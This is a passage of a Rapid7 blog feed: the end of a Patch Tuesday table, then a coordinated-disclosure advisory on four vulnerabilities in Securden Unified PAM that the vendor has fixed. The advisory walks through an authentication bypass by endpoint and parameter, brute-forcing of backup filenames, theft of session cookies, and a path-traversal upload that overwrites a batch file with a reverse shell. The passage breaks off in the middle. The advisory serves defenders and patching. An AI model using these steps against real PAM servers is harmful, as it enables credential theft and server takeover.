Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54108">CVE-2025-54108</a></td><td><p>Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53809">CVE-2025-53809</a></td><td><p>Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr></tbody></table><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/em-patch-tuesday-september-2025</link>
      <guid isPermaLink="false">blt8eec20c33ef90ebf</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Tue, 09 Sep 2025 20:45:52 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9952397815d84355/6849acff3860836b5c360685/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Securden Unified PAM: Multiple Critical Vulnerabilities (FIXED)]]></title>
      <description><![CDATA[<h2><span style='font-size: undefined;'>Overview</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>While performing continuous </span><a href="/fundamentals/what-is-a-red-team/" target="_self"><span style='font-size: undefined;'>red teaming</span></a><span style='font-size: undefined;'> exercises through Rapid7’s </span><a href="https://www.rapid7.com/services/continuous-red-team-service/"><span style='font-size: undefined;'>Vector Command</span></a><span style='font-size: undefined;'> service, Rapid7 discovered a total of four vulnerabilities in </span><a href="https://www.securden.com/privileged-account-manager/index.html"><span style='font-size: undefined;'>Securden Unified PAM</span></a><span style='font-size: undefined;'>. Three vulnerabilities were identified that allow an attacker to bypass authentication and view stored passwords or execute system commands on the server. The fourth identified vulnerability allows a malicious actor to access Securden’s gateway portal with low privileges, which could potentially be leveraged to exploit other customers running Securden Unified PAM. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Securden effectively coordinated with Rapid7 and quickly provided a patch to remediate all four vulnerabilities.</span></p><table><colgroup data-width='1250.0000000000002'><col style="width:18.18181818181818%"/><col style="width:21.159874608150467%"/><col style="width:10.501567398119121%"/><col style="width:34.48275862068965%"/><col style="width:15.673981191222566%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Vulnerability Name</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVSS</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Summary</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Vendor Provided Vulnerable Versions</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7: Securden Unified PAM Authentication Bypass</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2025-53118</span></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"><span style='font-size: undefined;'>CVSS 9.4</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>An authentication bypass vulnerability exists which allows an unauthenticated attacker to control administrator backup functions, leading to compromise of passwords, secrets, and application session tokens stored by the Unified PAM.</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>9.0.x through 11.3.1</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7: Securden Unified PAM Unauthenticated Unrestricted File Upload</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2025-53119</span></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"><span style='font-size: undefined;'>CVSS 7.5</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>An unauthenticated unrestricted file upload vulnerability allows an attacker to upload malicious binaries and scripts to the server.</span></p></td><td><p style="direction: ltr;">9.0.x through 11.3.1</p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7: Securden Unified PAM Path Traversal In File Upload</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2025-53120</span></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L"><span style='font-size: undefined;'>CVSS 9.4</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>A path traversal vulnerability in unauthenticated upload functionality allows a malicious actor to upload binaries and scripts to the server’s configuration and web root directories, achieving remote code execution on the Unified PAM server.</span></p></td><td><p style="direction: ltr;">9.0.x through 11.3.1</p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7: Securden Unified PAM Shared SSH Key and Cloud Infrastructure</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2025-6737</span></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"><span style='font-size: undefined;'>CVSS 7.2 </span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Securden’s Unified PAM Remote Vendor Gateway access portal shares infrastructure and access tokens across multiple tenants. A malicious actor can obtain authentication material and access the gateway server with low-privilege permissions.</span></p></td><td><p style="direction: ltr;">9.0.x through 11.3.1</p></td></tr></tbody></table><h2>Product description</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Securden Unified PAM can generally be described as an all-purpose server for access control. It can store, manage, and log access to credentials, as well as log when users request admin privileges. Remote access connections such as RDP and SSH can be initialized from the web application. Videos of these sessions can be recorded and saved for administrators’ review. User accounts can be integrated from Active Directory and can be managed to only have access to specific sets of credentials. For more information, visit </span><a href="https://www.securden.com/privileged-account-manager/index.html" target="_self"><span style='font-size: undefined;'>Securden’s site</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>All of this functionality related to access control makes it a prime target for malicious actors. </span></p><h2>Impact</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The first vulnerability, CVE-2025-53118, allows an attacker to bypass authentication protections to read saved credentials through access to application backup endpoints. The second vulnerability, CVE-2025-53120, allows an attacker to upload a file to any directory with any filename without authentication due to path traversal. The third vulnerability, CVE-2025-53119, allows an attacker to upload a file of any file type and any file content as a result of a lack of sufficient filetype validations. The last vulnerability, CVE-2025-6737, allows an attacker to authenticate to Securden’s gateway server with low-level permissions using shared credentials across installations.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Based on testing, exploitation of CVE-2025-53119 and CVE-2025-53120 was not viable on version 9.0.1, but was viable on version 11.1.x. While an attacker can leverage any of the disclosed vulnerabilities to achieve unauthenticated </span><a href="/fundamentals/what-is-remote-code-execution-rce/" target="_self"><span style='font-size: undefined;'>remote code execution (RCE)</span></a><span style='font-size: undefined;'>, an attack performed from an authenticated context would not require the authentication bypass to gain code execution capabilities.</span></p><h2>Credit</h2><p style="direction: ltr;"><span style='font-size: undefined;'>These issues were discovered by Aaron Herndon, Principal Security Consultant, and Marcus Chang, Security Consultant, both of Rapid7. They are being disclosed in accordance with </span><a href="https://www.rapid7.com/security/disclosure/"><span style='font-size: undefined;'>Rapid7's vulnerability disclosure policy</span></a><span style='font-size: undefined;'>.</span></p><h2>Vendor statement</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The following statement has been provided by Securden CEO, Bala Venkatramani.</span></p><blockquote><span style='font-size: undefined;'>"These vulnerabilities have been addressed in version 11.4.4 of Securden Unified PAM. At Securden, customer security is our top priority. We actively collaborate with esteemed researchers like Rapid7 to swiftly identify and remediate vulnerabilities. We appreciate the efforts of the security researchers at Rapid7 for their responsible disclosure and professionalism throughout the process. We have already sent advisories to all our customers individually.”</span></blockquote><h2>CVE-2025-53118: Authentication Bypass</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Browsing to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/thirdparty-access</span></span><span style='font-size: undefined;'> within the application will redirect the user to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/</span></span><span style='font-size: undefined;'> and assign a securdensession cookie value. This cookie can be used when requesting the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/get_csrf_token</span></span><span style='font-size: undefined;'> URL to obtain a </span><a href="https://www.rapid7.com/fundamentals/cross-site-request-forgery/"><span style='font-size: undefined;'>CSRF token</span></a><span style='font-size: undefined;'> and securdenpost cookie, which are used for POST requests. While the cookie has not yet been authorized through a valid login, Rapid7 identified several API endpoints within the application that do not check for authorization, and instead only the presence of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>securdensession</span></span><span style='font-size: undefined;'> cookie, </span><span style='font-size: undefined;'><span data-type='inlineCode'>securdenpost</span></span><span style='font-size: undefined;'> cookie, and a CSRF token generated from the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/thirdparty-access</span></span><span style='font-size: undefined;'> request.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><em><strong>Note: </strong></em></span><span style='font-size: undefined;'><em>POST requests sent by the application typically have an </em></span><span style='font-size: undefined;'><span data-type='inlineCode'><em>X-Requested-With</em></span></span><span style='font-size: undefined;'><em> header. However, if this header is present during authentication bypass requests, the server will respond with an error. Successful exploitation requires removing this header.</em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While reviewing API endpoints which are vulnerable to the authentication bypass, Rapid7 determined the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/configure_schedule</span></span><span style='font-size: undefined;'> request to have the highest impact, allowing unauthenticated users to perform the </span><a href="https://www.securden.com/privileged-access-management/help/account-management/how-to-add-and-manage-account-types-in-pam.html#offline-access"><span style='font-size: undefined;'>encrypted</span></a><span style='font-size: undefined;'> password backup functionality with their own specified password and location to drop the file. The encrypted password backup can only be performed if a </span><span style='font-size: undefined;'><span data-type='inlineCode'>superadmin</span></span><span style='font-size: undefined;'> account is present. In the case of a </span><span style='font-size: undefined;'><span data-type='inlineCode'>superadmin</span></span><span style='font-size: undefined;'> account not being present, an attacker could still leverage the endpoint to repeatedly perform full database backups and steal active session cookies to authenticate as logged in users.</span></p><h3><span style='font-size: undefined;'>/</span><span style='font-size: undefined;'>thirdparty-access</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 navigated to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/thirdparty-access</span></span><span style='font-size: undefined;'> and obtained a securdensession cookie:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd2eb52cf4b8382fc/68ac659f98564f5546b47f23/SD1.png" height="297" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD1.png" asset-alt="SD1.png" width="764" max-width="764" max-height="297" style="max-width: 764px; width: 764px; max-height: 297px; height: 297px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd2eb52cf4b8382fc/68ac659f98564f5546b47f23/SD1.png" data-sys-asset-uid="bltd2eb52cf4b8382fc" data-sys-asset-filename="SD1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD1.png" sys-style-type="display"/></figure><h3><span style='font-size: undefined;'>/get_csrf_token</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Using the securdensession cookie, Rapid7 browsed to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/get_csrf_token</span></span><span style='font-size: undefined;'> and obtained a CSRF token and securdenpost cookie.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt760fd522b0d2a602/68ac65d2974c2bf2c1e6bc58/SD2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD2.png" asset-alt="SD2.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt760fd522b0d2a602/68ac65d2974c2bf2c1e6bc58/SD2.png" data-sys-asset-uid="blt760fd522b0d2a602" data-sys-asset-filename="SD2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD2.png" sys-style-type="display"/></figure><h3><span style='font-size: undefined;'>Exploiting the backup features</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 then obtained the application server’s next start time for its scheduled tasks, using the authentication bypass to query </span><span style='font-size: undefined;'><span data-type='inlineCode'>/get_date_picker_format</span></span><span style='font-size: undefined;'>:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3f6f01d084346038/68ac65d295b27da8c7c6aed5/SD3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD3.png" asset-alt="SD3.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3f6f01d084346038/68ac65d295b27da8c7c6aed5/SD3.png" data-sys-asset-uid="blt3f6f01d084346038" data-sys-asset-filename="SD3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD3.png" sys-style-type="display"/></figure><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>A request was then sent to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/configure_schedule</span></span><span style='font-size: undefined;'> with the </span><span style='font-size: undefined;'><span data-type='inlineCode'>SCHEDULE_ENCRYPTED_HTML_BACKUP</span></span><span style='font-size: undefined;'> type, next task start date, a passphrase, and a location to write the backup file to. An attacker can choose to host an SMB share and have the file dropped there, or place it in the Unified PAM’s </span><span style='font-size: undefined;'><span data-type='inlineCode'>/static/</span></span><span style='font-size: undefined;'> webroot folder, allowing unauthenticated download of the file via the application’s web server. This request required the obtained CSRF token along with the securdenpost and securdensession cookies.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><em><strong>Note</strong></em></span><span style='font-size: undefined;'><em>: The written filename is not controlled by the attacker, nor is it a static name. However, as it is based on the date of the backup, the name can be guessed via brute forcing to download it from the web server.</em></span></p><p><span style='font-size: undefined;'><em></em></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt285e2e8213634662/68ac65d236f57ee448e743fb/SD4.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD4.png" asset-alt="SD4.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt285e2e8213634662/68ac65d236f57ee448e743fb/SD4.png" data-sys-asset-uid="blt285e2e8213634662" data-sys-asset-filename="SD4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD4.png" sys-style-type="display"/></figure><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>After waiting for the task to start, we see an SMB connection from PAM, writing the backup file to Rapid7’s SMB share.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><em><strong>Note</strong></em></span><span style='font-size: undefined;'><em>: This SMB connection could also be leveraged in a pass-back and NTLMv2 relay attack, as well as offline NTLMv2 hash cracking of the service account running the Unified PAM application. </em></span></p><p><span style='font-size: undefined;'><em></em></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9fc39ba84dfaefc5/68ac65d24f9d3d57c2821829/SD5.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD5.png" asset-alt="SD5.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9fc39ba84dfaefc5/68ac65d24f9d3d57c2821829/SD5.png" data-sys-asset-uid="blt9fc39ba84dfaefc5" data-sys-asset-filename="SD5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD5.png" sys-style-type="display"/></figure><p style="direction: ltr;"><span style='font-size: undefined;'>The backup file can be decrypted using the password defined by the attacker, revealing a full backup of all passwords stored in the Unified PAM:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfa3c48cd40030e59/68ac65d2c42f683ad0c4deac/SD6.png" height="393" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD6.png" asset-alt="SD6.png" width="447" max-width="447" max-height="393" style="max-width: 447px; width: 447px; max-height: 393px; height: 393px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfa3c48cd40030e59/68ac65d2c42f683ad0c4deac/SD6.png" data-sys-asset-uid="bltfa3c48cd40030e59" data-sys-asset-filename="SD6.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD6.png" sys-style-type="display"/></figure><h3><span style='font-size: undefined;'>Database backups when the “superadmin” is not enabled</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>When the </span><span style='font-size: undefined;'><span data-type='inlineCode'>superadmin</span></span><span style='font-size: undefined;'> user is not enabled, the application won’t create the encrypted password file. Still, it is possible to extract a backup of the entire Unified PAM application’s database. This database stores the credentials in an encrypted format, which cannot be decrypted unless the attacker has a key file on the application server. Instead, an attacker can extract active session tokens (cookies) from the database and impersonate user sessions, which can then be used to extract passwords through normal application workflows.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To backup the entire database instead of the encrypted passwords file, because of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>superadmin</span></span><span style='font-size: undefined;'> user not being enabled, the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/configure_schedule</span></span><span style='font-size: undefined;'> request can also be sent with </span><span style='font-size: undefined;'><span data-type='inlineCode'>DATABASE_BACKUP</span></span><span style='font-size: undefined;'> as the </span><span style='font-size: undefined;'><span data-type='inlineCode'>schedule_type</span></span><span style='font-size: undefined;'> and the </span><span style='font-size: undefined;'><span data-type='inlineCode'>backup_location</span></span><span style='font-size: undefined;'> can once again be set to PAM’s static folder or an external share. </span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0c972bd5bc0d271f/68ac65d298564fbec0b47f27/SD7.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD7.png" asset-alt="SD7.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0c972bd5bc0d271f/68ac65d298564fbec0b47f27/SD7.png" data-sys-asset-uid="blt0c972bd5bc0d271f" data-sys-asset-filename="SD7.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD7.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The backup file will have a predictable filename: </span><span style='font-size: undefined;'><span data-type='inlineCode'>Securden-&lt;version&gt;_postgresql_db_backup_&lt;day&gt;_&lt;Month&gt;_&lt;year&gt;_&lt;hour&gt;_&lt;minute&gt;_&lt;second&gt;.zip</span></span><span style='font-size: undefined;'>. By sending brute-force requests to the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/static/</span></span><span style='font-size: undefined;'> folder, the attacker can reliably guess the last two </span><span style='font-size: undefined;'><span data-type='inlineCode'>&lt;second&gt;</span></span><span style='font-size: undefined;'> digits of the file name and access the backup file.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While passwords and other sensitive information is encrypted in the backup file, Django session cookies are not. The exploit can be automated to run a backup every five minutes; when a user signs in, their cookie can be found in the database. </span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfbe494f01a5668b2/68ac65d2a77657ea37c2e9a1/SD8.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD8.png" asset-alt="SD8.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfbe494f01a5668b2/68ac65d2a77657ea37c2e9a1/SD8.png" data-sys-asset-uid="bltfbe494f01a5668b2" data-sys-asset-filename="SD8.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD8.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>If the timing is right and the cookie is still valid, it can be used to login as the user.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f44da8db34a9b1a/68ac65d2b1a8c0fca14fd86f/SD9.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD9.png" asset-alt="SD9.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f44da8db34a9b1a/68ac65d2b1a8c0fca14fd86f/SD9.png" data-sys-asset-uid="blt5f44da8db34a9b1a" data-sys-asset-filename="SD9.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD9.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><h2>CVE-2025-53119 / CVE-2025-53120: Unauthenticated Unrestricted File Upload and Path Traversal In File Upload</h2><p></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2025-53119</strong></span><span style='font-size: undefined;'> - The </span><span style='font-size: undefined;'><span data-type='inlineCode'>/accountapp/upload_web_recordings_from_api_server</span></span><span style='font-size: undefined;'> request allows for unrestricted file upload without authentication. Attackers can upload any file with any filetype to the server’s web recordings directory.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2025-53120</strong></span><span style='font-size: undefined;'> - Arbitrary files can be overwritten with path traversal characters in the </span><span style='font-size: undefined;'><span data-type='inlineCode'>file_name</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>relative_path</span></span><span style='font-size: undefined;'> parameters of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/accountapp/upload_web_recordings_from_api_server</span></span><span style='font-size: undefined;'> request . </span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>These can be leveraged for remote code execution in multiple ways. As an example, in the screenshot below, the </span><span style='font-size: undefined;'><span data-type='inlineCode'>postgresBackup.bat</span></span><span style='font-size: undefined;'> file was overwritten with a malicious PowerShell command that would send a reverse shell to the attacker. The file was overwritten by editing the </span><span style='font-size: undefined;'><span data-type='inlineCode'>file_name</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>relative_path</span></span><span style='font-size: undefined;'> parameters to point to the </span><span style='font-size: undefined;'><span data-type='inlineCode'>postgresBackup.bat</span></span><span style='font-size: undefined;'> file. In this request, the exact value of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>relative_path</span></span><span style='font-size: undefined;'> parameter is arbitrary. It only needs to traverse one directory back with </span><span style='font-size: undefined;'><span data-type='inlineCode'>.../&lt;arbitrary_string&gt;</span></span><span style='font-size: undefined;'>. The </span><span style='font-size: undefined;'><span data-type='inlineCode'>postgresBackup.bat</span></span><span style='font-size: undefined;'> batch script is present by default and runs whenever a database backup occurs.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf4b94494dc389175/68ac65d278db105560f47323/SD10.png" height="443" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD10.png" asset-alt="SD10.png" width="617" max-width="617" max-height="443" style="max-width: 617px; width: 617px; max-height: 443px; height: 443px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf4b94494dc389175/68ac65d278db105560f47323/SD10.png" data-sys-asset-uid="bltf4b94494dc389175" data-sys-asset-filename="SD10.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD10.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By exploiting the authentication bypass mentioned previously, CVE-2025-53118, a database backup can be triggered:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5fddc3d81ef15910/68ac65d2d7406237c616dd04/SD11.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD11.png" asset-alt="SD11.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5fddc3d81ef15910/68ac65d2d7406237c616dd04/SD11.png" data-sys-asset-uid="blt5fddc3d81ef15910" data-sys-asset-filename="SD11.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD11.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>On backup, the application server runs the batch script containing the PowerShell reverse shell, and the attacker can run privileged OS commands on the PAM server:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2387ab5a8d250dab/68ac65d2d74062c6f816dd02/SD12.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD12.png" asset-alt="SD12.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2387ab5a8d250dab/68ac65d2d74062c6f816dd02/SD12.png" data-sys-asset-uid="blt2387ab5a8d250dab" data-sys-asset-filename="SD12.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD12.png" sys-style-type="display"/></figure><h2>CVE-2025-6737: Shared SSH Key and Cloud Infrastructure</h2><p style="direction: ltr;"><span style='font-size: undefined;'>While reviewing application logs produced by Securden’s Unified PAM (version 11.2.5), Rapid7 discovered an entry indicating that the application server had established a reverse SSH tunnel to a remote server, using a key placed on disk, exposing the login page for Rapid7’s local Unified PAM used for testing:</span></p><p></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt14179b2670b4c87c/68ac65d2b3421a6c12096803/SD13.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD13.png" asset-alt="SD13.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt14179b2670b4c87c/68ac65d2b3421a6c12096803/SD13.png" data-sys-asset-uid="blt14179b2670b4c87c" data-sys-asset-filename="SD13.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD13.png" sys-style-type="display"/></figure><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>At first, Rapid7 investigated the IP, as it was foreign, and reviewing additional logs within “reversetunnelcreator.log” revealed an IP address that was hosted in South Korea:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c60508d2c85e9f8/68ac65d236f57e3306e743f7/SD14.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD14.png" asset-alt="SD14.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c60508d2c85e9f8/68ac65d236f57e3306e743f7/SD14.png" data-sys-asset-uid="blt3c60508d2c85e9f8" data-sys-asset-filename="SD14.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD14.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Additionally, Rapid7 discovered that the SSH key </span><span style='font-size: undefined;'><span data-type='inlineCode'>tunnel-user-key.pem</span></span><span style='font-size: undefined;'> was deleted from disk after the tunnel was established. Using PowerShell, Rapid7 wrote a small loop to monitor file write events for the key and copy it, and then restarted the Securden service, noticing that SSH log entries aligned with service and server restart times:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc0b5b79f931c4beb/68ac65d27ff584ed66187a2e/SD15.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD15.png" asset-alt="SD15.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc0b5b79f931c4beb/68ac65d27ff584ed66187a2e/SD15.png" data-sys-asset-uid="bltc0b5b79f931c4beb" data-sys-asset-filename="SD15.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD15.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 executed the SSH command which their Unified PAM server utilized, connecting to 18.217.245.55’s SSH service on port 443. Without context into the functionality, Rapid7 originally thought this may have been an update server deployed by Securden to push down new packages. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To check if the server was exposing the admin panel for Rapid7’s local PAM server used for testing, Rapid7 ran a netstat command, discovering several other tunnels and connections from various IP addresses:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc9039741edbc11e5/68ac659fe1265f2411cdd0de/SD16.png" height="408" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD16.png" asset-alt="SD16.png" width="510" max-width="510" max-height="408" style="max-width: 510px; width: 510px; max-height: 408px; height: 408px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc9039741edbc11e5/68ac659fe1265f2411cdd0de/SD16.png" data-sys-asset-uid="bltc9039741edbc11e5" data-sys-asset-filename="SD16.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD16.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span 